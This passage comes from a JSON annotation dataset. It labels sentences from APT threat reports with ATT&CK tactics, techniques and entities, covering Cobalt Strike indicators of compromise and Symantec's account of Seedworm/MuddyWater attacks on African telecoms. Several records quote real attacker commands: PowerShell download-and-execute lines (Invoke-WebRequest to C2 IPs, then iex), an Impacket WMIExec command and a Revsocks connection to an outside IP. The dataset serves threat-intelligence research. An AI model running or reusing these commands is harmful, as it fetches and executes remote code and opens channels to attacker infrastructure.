44223e5abd106c077908f03c93b8c8baee7d630f1718f9750f16b786cf88fd06 553e0763cf3a938b5754c9d89939a118abe0b235e4be6920c34f562bd758e586 4/7", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p5-s40-286e29", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 5, "sentence_id": 40, "context_before": "Scanning Tool 9ebd789e8ca8b96ed55fc8e95c98a45a61baea3805fd440f50f2bde5ffd7a372 – Fast Reverse Proxy 9f5f7ba7d276f162cc32791bfbaa0199013290a8ac250eb95fd90bc004c3fd36 – Cobalt Strike Beacon a0f5966fcc64ce2d10f24e02ae96cdc91590452b9a96b3b1d4a2f66c722eec34 – AllIn Scanning Tool cb03b5d517090b20749905a330c55df9eb4d1c6b37b1b31fae1982e32fd10009 – Fscan d1c4968e7690fd40809491acc8787389de0b7cbc672c235639ae7b4d07d04dd4 – Shellcode Loader de01492b44372f2e4e38354845e7f86e0be5fb8f5051baafd004ec5c1567039f – Cobalt Strike Beacon e378d8b5a35d4ec75cae7524e64c1d605f1511f9630c671321ee46aa7c4d378b – PE File eba22f50eedfec960fac408d9e6add4b0bd91dd5294bee8cff730db53b822841 – Dropper fc4b5f2ee9da1fe105bb1b7768754d48f798bf181cbc53583387578a5ebc7b56 – Dogz Proxy Tool 02fe00ffd1b076983f3866c04ca95c56cef88c2564fabb586e11e54986e87ba7 084d1fc4236011d442801e423485c8e58f68dc14ec0a8b716fa0fd210de43dda 1744fac628262aa0cf3810bd5168375959be41764c8ca2fa41950a7b1f8f2fad 1d087f6a17227769bcebc799a2cdf1bb2a8fdf6ba560d21a88bb71f1c213a42c 327fc116f8f48f97292184bb50cb3db418f368b3e2a0fb41267ba40254a35a89 3516f94b0fb57e93c6659d813cbf5fb3617dea7a667c78cb70a1914306327906 41b6d26926706bb68530ddff234f69757e3bbef91c47eb0255313ed86cb3f806 44223e5abd106c077908f03c93b8c8baee7d630f1718f9750f16b786cf88fd06 553e0763cf3a938b5754c9d89939a118abe0b235e4be6920c34f562bd758e586 4/7", "sentence_text": "5a62abc0a2208679e414cc71d1f36ffa14b48df2b73ac520e45d557ad77dd004\n6770f815480d7cfa0a6fc8599c08ca6013f608d257a2121233e77374e21c53f8\n6cb815863088a0ad367b2a525a572323600596f6875a79536aee57202ef24fd5\n6f017ad84d0d06f50b6213a0742838b5ec510f3d06f96e0300048f2da6a35c41\n7394ab0ed6d1f62e83fc5f8f1eb720ddd07cbd2bcdf6a00b9b63ef6018fa5f90\n7800a4fb0cbdf29815c521ea8b00a23e28d7eb365653f2afcfb5572622727218\n7f6a1d6950a9464f27d8651a267563d4630d223bf7ac66851917a57f8fac6550\n84502fbe3e5172c39e9a97734e6caac79255abffcb55c22752620d908ff33940\n916b63b88de2549c4a5c8e13d51df4cf6996067ae30f24c8bb35c66db7c061df\n968b28f7d6abb845f2cc7efa93cdcf7660585e22d589267695726de13afea260\n9e8b5a84ad108a761619ca040788dcbf07996a9101cecc5c30ba61f9a06945c1\nb53d0a43ea91b3c80bc6c87c0c6946816c38876b2cb2f6f772afe94c54d3ad30\nb5c4f420067499522b748a34161ad6e140a7f30ab0b8fa63feef760c5e631679\nd0ae66022929c17f31ddf98d88817f0aa70a56ce2ff2df9595b8889c2d3d7e31\nd92c50a91bd5b2f06f41a9a5f9937e50b78658d46e3cd04bc3a85f270ce288c2\ndc3b714fd6f93c0c0cd2685b6b8cd551896855474bdd09593b8c6b4b7ab6bac2\ne7684a4984d9d82115c5cc1b43b9f63a11e7ed333a4e2d92dc15b6e931634bf4\nebc3dabf0a2dafb0790be6dbb4d3509b5ce1259b955172910618a32627b3b668\nee9aefde33ed48d16ecb1c41256fc7d93ddfa8bedfa59b95e8810282ac164d0d\nf35b206fe10ad3f57d9c4ecf71a2d2cc06d7c7fe905e567b989f72f147da99dc\nf73738e6e33286657cda81f618a74b74745590915a8f4451e7c00473cbe89e1d\nfc8a67b80b0b0ecd10dfd90820ffc64923b94c32b04dbb6929a79b9ce027563c\nffdcf74968805e9cc897ca932e4da0f22ea7b3e9b96fcc9082c0c5300ae4cb0d\nNetwork Indicators\nIPs\n5/7", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-19_aptnotes_report-p6-s41-f47471", "source": "aptnotes", "doc_id": "19_aptnotes_report", "page_number": 6, "sentence_id": 41, "context_before": "5a62abc0a2208679e414cc71d1f36ffa14b48df2b73ac520e45d557ad77dd004\n6770f815480d7cfa0a6fc8599c08ca6013f608d257a2121233e77374e21c53f8\n6cb815863088a0ad367b2a525a572323600596f6875a79536aee57202ef24fd5\n6f017ad84d0d06f50b6213a0742838b5ec510f3d06f96e0300048f2da6a35c41\n7394ab0ed6d1f62e83fc5f8f1eb720ddd07cbd2bcdf6a00b9b63ef6018fa5f90\n7800a4fb0cbdf29815c521ea8b00a23e28d7eb365653f2afcfb5572622727218\n7f6a1d6950a9464f27d8651a267563d4630d223bf7ac66851917a57f8fac6550\n84502fbe3e5172c39e9a97734e6caac79255abffcb55c22752620d908ff33940\n916b63b88de2549c4a5c8e13d51df4cf6996067ae30f24c8bb35c66db7c061df\n968b28f7d6abb845f2cc7efa93cdcf7660585e22d589267695726de13afea260\n9e8b5a84ad108a761619ca040788dcbf07996a9101cecc5c30ba61f9a06945c1\nb53d0a43ea91b3c80bc6c87c0c6946816c38876b2cb2f6f772afe94c54d3ad30\nb5c4f420067499522b748a34161ad6e140a7f30ab0b8fa63feef760c5e631679\nd0ae66022929c17f31ddf98d88817f0aa70a56ce2ff2df9595b8889c2d3d7e31\nd92c50a91bd5b2f06f41a9a5f9937e50b78658d46e3cd04bc3a85f270ce288c2\ndc3b714fd6f93c0c0cd2685b6b8cd551896855474bdd09593b8c6b4b7ab6bac2\ne7684a4984d9d82115c5cc1b43b9f63a11e7ed333a4e2d92dc15b6e931634bf4\nebc3dabf0a2dafb0790be6dbb4d3509b5ce1259b955172910618a32627b3b668\nee9aefde33ed48d16ecb1c41256fc7d93ddfa8bedfa59b95e8810282ac164d0d\nf35b206fe10ad3f57d9c4ecf71a2d2cc06d7c7fe905e567b989f72f147da99dc\nf73738e6e33286657cda81f618a74b74745590915a8f4451e7c00473cbe89e1d\nfc8a67b80b0b0ecd10dfd90820ffc64923b94c32b04dbb6929a79b9ce027563c\nffdcf74968805e9cc897ca932e4da0f22ea7b3e9b96fcc9082c0c5300ae4cb0d\nNetwork Indicators\nIPs\n5/7", "sentence_text": "39.101.194[.]61 – Cobalt Strike Beacon C&C 47.92.138[.]241 – Cobalt Strike Beacon C&C 106.14.184[.]148 180.119.234[.]147 Domains alidocs.dingtalk[.]com.wswebpic[.]com – Cobalt Strike Beacon C&C csc.zte[.]com.cn.wswebpic[.]com – Cobalt Strike Beacon C&C taoche[.]cn.wswebpic[.]com – Cobalt Strike Beacon C&C URLs hxxp://47.92.138[.]241:8090/update.exe hxxp://47.92.138[.]241:8000/agent.exe hxxp://47.92.138[.]241:8000/update.exe hxxp://47.92.138[.]241:8000/ff.exe hxxp://47.92.138[.]241:8000/aa.exe hxxp://47.92.138[.]241:8000/runas.exe hxxp://47.92.138[.]241:8090/a.exe hxxp://47.92.138[.]241:8000/t.exe hxxp://47.92.138[.]241:8000/po.exe hxxp://47.92.138[.]241:8080/t.exe hxxp://47.92.138[.]241:8899/t.exe hxxp://47.92.138[.]241:8000/logo.png hxxp://47.92.138[.]241:8080/t.png hxxp://47.92.138[.]241:8000/frp.exe About the Author 6/7", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p1-s1-45bb11", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Seedworm: Iranian Hackers Target Telecoms Orgs in North and East Africa symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms Iranian espionage group Seedworm (aka Muddywater) has been targeting organizations operating in the telecommunications sector in Egypt, Sudan, and Tanzania.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p1-s2-442091", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 1, "sentence_id": 2, "context_before": "Seedworm: Iranian Hackers Target Telecoms Orgs in North and East Africa symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms Iranian espionage group Seedworm (aka Muddywater) has been targeting organizations operating in the telecommunications sector in Egypt, Sudan, and Tanzania.", "sentence_text": "It has been publicly stated that Seedworm is a cyberespionage group that is believed to be a subordinate part of Iran’s Ministry of Intelligence and Security (MOIS).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p1-s3-1a52bf", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 1, "sentence_id": 3, "context_before": "It has been publicly stated that Seedworm is a cyberespionage group that is believed to be a subordinate part of Iran’s Ministry of Intelligence and Security (MOIS).", "sentence_text": "The attackers used a variety of tools in this activity, which occurred in November 2023, including leveraging the MuddyC2Go infrastructure, which was recently discovered and documented by Deep Instinct.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p1-s4-43d368", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 1, "sentence_id": 4, "context_before": "The attackers used a variety of tools in this activity, which occurred in November 2023, including leveraging the MuddyC2Go infrastructure, which was recently discovered and documented by Deep Instinct.", "sentence_text": "Researchers on Symantec’s Threat Hunter Team, part of Broadcom, found a MuddyC2Go PowerShell launcher in the activity we investigated.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p1-s5-5a399f", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 1, "sentence_id": 5, "context_before": "Researchers on Symantec’s Threat Hunter Team, part of Broadcom, found a MuddyC2Go PowerShell launcher in the activity we investigated.", "sentence_text": "Attack Chain\nThe attacks in this campaign occurred in November 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p1-s6-af6dc8", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 1, "sentence_id": 6, "context_before": "Attack Chain\nThe attacks in this campaign occurred in November 2023.", "sentence_text": "Most of the activity we observed occurred on one telecommunications organization.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p1-s7-23fcd1", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 1, "sentence_id": 7, "context_before": "Most of the activity we observed occurred on one telecommunications organization.", "sentence_text": "The first evidence of malicious activity was some PowerShell executions related to the MuddyC2Go backdoor.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.001", "name": "Command and Scripting Interpreter: PowerShell" } ], "procedure": "Execute PowerShell commands associated with the MuddyC2Go backdoor to perform malicious operations.", "entities": [ { "text": "PowerShell executions", "start": 50, "end": 71, "label": "Action" }, { "text": "MuddyC2Go backdoor", "start": 87, "end": 105, "label": "MalwareTool" } ] }, { "uid": "aptnotes-20_aptnotes_report-p1-s8-d08f4b", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 1, "sentence_id": 8, "context_before": "The first evidence of malicious activity was some PowerShell executions related to the MuddyC2Go backdoor.", "sentence_text": "A MuddyC2Go launcher named “vcruntime140.dll” was saved in the folder “csidl_common_appdata\\javax”, which seems to have been sideloaded by jabswitch.exe.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1574.002", "name": "Hijack Execution Flow: DLL Side-Loading" } ], "procedure": "Save a malicious DLL (vcruntime140.dll) in a specific directory and execute it via DLL side-loading using jabswitch.exe.", "entities": [ { "text": "was saved in the folder", "start": 46, "end": 69, "label": "Action" }, { "text": "sideloaded by jabswitch.exe", "start": 125, "end": 152, "label": "Action" }, { "text": "MuddyC2Go launcher", "start": 2, "end": 20, "label": "MalwareTool" }, { "text": "vcruntime140.dll", "start": 28, "end": 44, "label": "MalwareTool" }, { "text": "csidl_common_appdata\\javax", "start": 71, "end": 97, "label": "Infrastructure_Indicator" }, { "text": "jabswitch.exe", "start": 139, "end": 152, "label": "MalwareTool" } ] }, { "uid": "aptnotes-20_aptnotes_report-p1-s9-25b224", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 1, "sentence_id": 9, "context_before": "A MuddyC2Go launcher named “vcruntime140.dll” was saved in the folder “csidl_common_appdata\\javax”, which seems to have been sideloaded by jabswitch.exe.", "sentence_text": "Jabswitch.exe is a legitimate Java Platform SE 8 executable.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p1-s10-c08d06", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 1, "sentence_id": 10, "context_before": "Jabswitch.exe is a legitimate Java Platform SE 8 executable.", "sentence_text": "The MuddyC2Go launcher executed the following PowerShell code to connect to its command-and-control (C&C) server:\ntppmjyfiqnqptrfnhhfeczjgjicgegydytihegfwldobtvicmthuqurdynllcnjworqepp;$tppmjy\nfiqnqptrfnhhfeczjgjicgegydytihegfwldobtvicmthuqurdynllcnjworqepp=\"tppmjyfiqnqp\ntrfnhhfeczjgjicgegydytihegfwldobtvicmthuqurdynllcnjworqepp\";$uri\n=\"http://95.164.38.99:443/HR5rOv8enEKonD4a0UdeGXD3xtxWix2Nf\";$response =\nInvoke-WebRequest -Uri $uri -Method GET -ErrorAction", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1059.001", "name": "Command and Scripting Interpreter: PowerShell" }, { "id": "T1071.001", "name": "Application Layer Protocol: Web Protocols" } ], "procedure": "Execute obfuscated PowerShell code that uses Invoke-WebRequest to communicate with a remote C2 server over HTTP.", "entities": [ { "text": "executed the following PowerShell code", "start": 23, "end": 61, "label": "Action" }, { "text": "Invoke-WebRequest -Uri $uri -Method GET", "start": 410, "end": 449, "label": "Action" }, { "text": "http://95.164.38.99:443/HR5rOv8enEKonD4a0UdeGXD3xtxWix2Nf", "start": 339, "end": 396, "label": "Infrastructure_Indicator" }, { "text": "MuddyC2Go launcher", "start": 4, "end": 22, "label": "MalwareTool" } ] }, { "uid": "aptnotes-20_aptnotes_report-p1-s11-23dd20", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 1, "sentence_id": 11, "context_before": "The MuddyC2Go launcher executed the following PowerShell code to connect to its command-and-control (C&C) server:\ntppmjyfiqnqptrfnhhfeczjgjicgegydytihegfwldobtvicmthuqurdynllcnjworqepp;$tppmjy\nfiqnqptrfnhhfeczjgjicgegydytihegfwldobtvicmthuqurdynllcnjworqepp=\"tppmjyfiqnqp\ntrfnhhfeczjgjicgegydytihegfwldobtvicmthuqurdynllcnjworqepp\";$uri\n=\"http://95.164.38.99:443/HR5rOv8enEKonD4a0UdeGXD3xtxWix2Nf\";$response =\nInvoke-WebRequest -Uri $uri -Method GET -ErrorAction", "sentence_text": "Stop -usebasicparsing;iex $response.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p1-s13-f6cb64", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 1, "sentence_id": 13, "context_before": "Content;", "sentence_text": "It appears that the variables at the beginning of the code are there for the purposes of attempting to bypass detection by security software, as they are unused and not relevant.\n1/6", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p2-s14-ba1e9a", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 2, "sentence_id": 14, "context_before": "It appears that the variables at the beginning of the code are there for the purposes of attempting to bypass detection by security software, as they are unused and not relevant.\n1/6", "sentence_text": "Right after this execution, attackers launched the MuddyC2Go malware using a scheduled task that had previously been created:\n\"CSIDL_SYSTEM\\schtasks.exe\" /run /tn", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1053.005", "name": "Scheduled Task/Job: Scheduled Task" } ], "procedure": "Execute MuddyC2Go malware by triggering a previously created scheduled task using schtasks.exe.", "entities": [ { "text": "launched the MuddyC2Go malware", "start": 38, "end": 68, "label": "Action" }, { "text": "using a scheduled task", "start": 69, "end": 91, "label": "Action" }, { "text": "schtasks.exe", "start": 140, "end": 152, "label": "MalwareTool" }, { "text": "MuddyC2Go malware", "start": 51, "end": 68, "label": "MalwareTool" } ] }, { "uid": "aptnotes-20_aptnotes_report-p2-s15-6d76b4", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 2, "sentence_id": 15, "context_before": "Right after this execution, attackers launched the MuddyC2Go malware using a scheduled task that had previously been created:\n\"CSIDL_SYSTEM\\schtasks.exe\" /run /tn", "sentence_text": "\"Microsoft\\Windows\\JavaX\\Java Autorun\" The attackers also used some typical commands related to the Impacket WMIExec hacktool:\ncmd.exe /Q /c cd \\ 1> \\\\127.0.0.1\\ADMIN$\\__1698662615.0451615 2>&1 The SimpleHelp remote access tool was also leveraged, connecting to the 146.70.124[.]102 C&C server.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1047", "name": "Windows Management Instrumentation" }, { "id": "T1219", "name": "Remote Access Tools" } ], "procedure": "used Impacket WMIExec commands and leveraged the SimpleHelp remote access tool to connect to 146.70.124[.]102 C&C server", "entities": [ { "text": "attackers", "start": 43, "end": 52, "label": "ThreatActor" }, { "text": "Impacket WMIExec hacktool", "start": 100, "end": 125, "label": "MalwareTool" }, { "text": "SimpleHelp remote access tool", "start": 198, "end": 227, "label": "MalwareTool" }, { "text": "146.70.124[.]102", "start": 266, "end": 282, "label": "Infrastructure_Indicator" }, { "text": "used some typical commands related to the Impacket WMIExec hacktool", "start": 58, "end": 125, "label": "Action" }, { "text": "was also leveraged", "start": 228, "end": 246, "label": "Action" }, { "text": "connecting to the 146.70.124[.]102 C&C server", "start": 248, "end": 293, "label": "Action" } ] }, { "uid": "aptnotes-20_aptnotes_report-p2-s16-091598", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 2, "sentence_id": 16, "context_before": "\"Microsoft\\Windows\\JavaX\\Java Autorun\" The attackers also used some typical commands related to the Impacket WMIExec hacktool:\ncmd.exe /Q /c cd \\ 1> \\\\127.0.0.1\\ADMIN$\\__1698662615.0451615 2>&1 The SimpleHelp remote access tool was also leveraged, connecting to the 146.70.124[.]102 C&C server.", "sentence_text": "Further PowerShell stager execution also occurred, while the attacker also executed the Revsocks tool:", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1059.001", "name": "Command and Scripting Interpreter: PowerShell" } ], "procedure": "Execute a PowerShell stager and run the Revsocks tool to establish remote communication capabilities.", "entities": [ { "text": "PowerShell stager execution", "start": 8, "end": 35, "label": "Action" }, { "text": "executed the Revsocks tool", "start": 75, "end": 101, "label": "Action" }, { "text": "Revsocks tool", "start": 88, "end": 101, "label": "MalwareTool" } ] }, { "uid": "aptnotes-20_aptnotes_report-p2-s17-5781e3", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 2, "sentence_id": 17, "context_before": "Further PowerShell stager execution also occurred, while the attacker also executed the Revsocks tool:", "sentence_text": "CSIDL_COMMON_APPDATA\\do.exe -co 94.131.3.160:443 -pa super -q", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p2-s18-d99e97", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 2, "sentence_id": 18, "context_before": "CSIDL_COMMON_APPDATA\\do.exe -co 94.131.3.160:443 -pa super -q", "sentence_text": "The attackers also used a second legitimate remote access tool, AnyDesk, which was deployed on the same computer as Revsocks and SimpleHelp, while PowerShell executions related to MuddyC2Go also occurred on the same machine:\n$uri =\"http://45.150.64.39:443/HJ3ytbqpne2tsJTEJi2D8s0hWo172A0aT\";$response = Invoke-WebRequest -Uri $uri -Method GET -ErrorAction", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1059.001", "name": "Command and Scripting Interpreter: PowerShell" }, { "id": "T1071.001", "name": "Application Layer Protocol: Web Protocols" } ], "procedure": "Execute PowerShell commands that use Invoke-WebRequest to communicate with a remote C2 server over HTTP while leveraging remote access tools on the compromised host.", "entities": [ { "text": "PowerShell executions", "start": 147, "end": 168, "label": "Action" }, { "text": "Invoke-WebRequest -Uri $uri -Method GET", "start": 303, "end": 342, "label": "Action" }, { "text": "http://45.150.64.39:443/HJ3ytbqpne2tsJTEJi2D8s0hWo172A0aT", "start": 232, "end": 289, "label": "Infrastructure_Indicator" }, { "text": "AnyDesk", "start": 64, "end": 71, "label": "MalwareTool" }, { "text": "Revsocks", "start": 116, "end": 124, "label": "MalwareTool" }, { "text": "SimpleHelp", "start": 129, "end": 139, "label": "MalwareTool" }, { "text": "MuddyC2Go", "start": 180, "end": 189, "label": "MalwareTool" } ] }, { "uid": "aptnotes-20_aptnotes_report-p2-s19-312eed", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 2, "sentence_id": 19, "context_before": "The attackers also used a second legitimate remote access tool, AnyDesk, which was deployed on the same computer as Revsocks and SimpleHelp, while PowerShell executions related to MuddyC2Go also occurred on the same machine:\n$uri =\"http://45.150.64.39:443/HJ3ytbqpne2tsJTEJi2D8s0hWo172A0aT\";$response = Invoke-WebRequest -Uri $uri -Method GET -ErrorAction", "sentence_text": "Stop -usebasicparsing;iex $response.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p2-s20-359650", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 2, "sentence_id": 20, "context_before": "Stop -usebasicparsing;iex $response.", "sentence_text": "Content;\nNotably, this organization is believed to have previously been infiltrated by Seedworm earlier in 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p2-s21-005d6a", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 2, "sentence_id": 21, "context_before": "Content;\nNotably, this organization is believed to have previously been infiltrated by Seedworm earlier in 2023.", "sentence_text": "During that intrusion, it’s believed the attackers used WMI to launch the SimpleHelp installer on the victim network.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1047", "name": "Windows Management Instrumentation" } ], "procedure": "Use Windows Management Instrumentation (WMI) to remotely launch the SimpleHelp installer on a victim system.", "entities": [ { "text": "used WMI to launch the SimpleHelp installer", "start": 51, "end": 94, "label": "Action" }, { "text": "WMI", "start": 56, "end": 59, "label": "MalwareTool" }, { "text": "SimpleHelp installer", "start": 74, "end": 94, "label": "MalwareTool" } ] }, { "uid": "aptnotes-20_aptnotes_report-p2-s22-88bc25", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 2, "sentence_id": 22, "context_before": "During that intrusion, it’s believed the attackers used WMI to launch the SimpleHelp installer on the victim network.", "sentence_text": "In another telecommunications and media company targeted by the attackers, multiple incidents of SimpleHelp were used to connect to known Seedworm infrastructure.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1219", "name": "Remote Access Software" } ], "procedure": "Use SimpleHelp remote access software to establish connections to attacker-controlled infrastructure associated with Seedworm.", "entities": [ { "text": "were used to connect to", "start": 108, "end": 131, "label": "Action" }, { "text": "SimpleHelp", "start": 97, "end": 107, "label": "MalwareTool" }, { "text": "Seedworm infrastructure", "start": 138, "end": 161, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-20_aptnotes_report-p2-s23-99f42b", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 2, "sentence_id": 23, "context_before": "In another telecommunications and media company targeted by the attackers, multiple incidents of SimpleHelp were used to connect to known Seedworm infrastructure.", "sentence_text": "A custom build of the Venom Proxy hacktool was also executed on this network, as well as the new custom keylogger used by the attackers in this activity.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": null, "procedure": "Execute a custom Venom Proxy tool and a custom keylogger on the victim network.", "entities": [ { "text": "was also executed on this network", "start": 43, "end": 76, "label": "Action" }, { "text": "used by the attackers", "start": 114, "end": 135, "label": "Action" }, { "text": "Venom Proxy hacktool", "start": 22, "end": 42, "label": "MalwareTool" }, { "text": "custom keylogger", "start": 97, "end": 113, "label": "MalwareTool" } ] }, { "uid": "aptnotes-20_aptnotes_report-p3-s25-a88c12", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 3, "sentence_id": 25, "context_before": "2/6", "sentence_text": "Toolset\nThe most interesting part of the toolset used in this activity is probably the presence of the MuddyC2Go launcher, which was sideloaded by jabswitch.exe.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1574.002", "name": "Hijack Execution Flow: DLL Side-Loading" } ], "procedure": "Execute the MuddyC2Go launcher by sideloading it through the legitimate jabswitch.exe process.", "entities": [ { "text": "was sideloaded by jabswitch.exe", "start": 129, "end": 160, "label": "Action" }, { "text": "MuddyC2Go launcher", "start": 103, "end": 121, "label": "MalwareTool" }, { "text": "jabswitch.exe", "start": 147, "end": 160, "label": "MalwareTool" } ] }, { "uid": "aptnotes-20_aptnotes_report-p3-s26-bbc36c", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 3, "sentence_id": 26, "context_before": "Toolset\nThe most interesting part of the toolset used in this activity is probably the presence of the MuddyC2Go launcher, which was sideloaded by jabswitch.exe.", "sentence_text": "The malware reads the C&C URL from the Windows registry value “End” stored inside the key “HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\Tcpip”.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1012", "name": "Query Registry" } ], "procedure": "Read a command-and-control (C2) URL from a specific Windows registry key to retrieve configuration for later communication.", "entities": [ { "text": "reads the C&C URL from the Windows registry", "start": 12, "end": 55, "label": "Action" }, { "text": "C&C URL", "start": 22, "end": 29, "label": "Infrastructure_Indicator" }, { "text": "HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\Tcpip", "start": 91, "end": 139, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-20_aptnotes_report-p3-s27-37ed0a", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 3, "sentence_id": 27, "context_before": "The malware reads the C&C URL from the Windows registry value “End” stored inside the key “HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\Tcpip”.", "sentence_text": "The URL path is read from the “Status” value in the same aforementioned key.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1012", "name": "Query Registry" } ], "procedure": "Read a URL path value from a Windows registry key.", "entities": [ { "text": "is read from", "start": 13, "end": 25, "label": "Action" }, { "text": "URL path", "start": 4, "end": 12, "label": "Infrastructure_Indicator" }, { "text": "Status", "start": 31, "end": 37, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-20_aptnotes_report-p3-s28-6b37b3", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 3, "sentence_id": 28, "context_before": "The URL path is read from the “Status” value in the same aforementioned key.", "sentence_text": "Lastly, the MuddyC2GO launcher executes the following PowerShell command to contact its C&C server and execute the PowerShell code received:\npowershell.exe -c $uri ='{C2_URI}';$response = Invoke-WebRequest - UseBasicParsing -Uri", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1059.001", "name": "Command and Scripting Interpreter: PowerShell" }, { "id": "T1071.001", "name": "Application Layer Protocol: Web Protocols" } ], "procedure": "Execute a PowerShell command that uses Invoke-WebRequest to contact a C2 server and execute the received code.", "entities": [ { "text": "executes the following PowerShell command", "start": 31, "end": 72, "label": "Action" }, { "text": "contact its C&C server", "start": 76, "end": 98, "label": "Action" }, { "text": "execute the PowerShell code received", "start": 103, "end": 139, "label": "Action" }, { "text": "Invoke-WebRequest", "start": 188, "end": 205, "label": "Action" }, { "text": "MuddyC2GO launcher", "start": 12, "end": 30, "label": "MalwareTool" } ] }, { "uid": "aptnotes-20_aptnotes_report-p3-s29-62d596", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 3, "sentence_id": 29, "context_before": "Lastly, the MuddyC2GO launcher executes the following PowerShell command to contact its C&C server and execute the PowerShell code received:\npowershell.exe -c $uri ='{C2_URI}';$response = Invoke-WebRequest - UseBasicParsing -Uri", "sentence_text": "$uri -Method GET -ErrorAction", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-20_aptnotes_report-p3-s30-e9a047", "source": "aptnotes", "doc_id": "20_aptnotes_report", "page_number": 3, "sentence_id": 30, "context_before": "$uri -Method GET -ErrorAction", "sentence_text": "Stop;Write-Output $response.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { 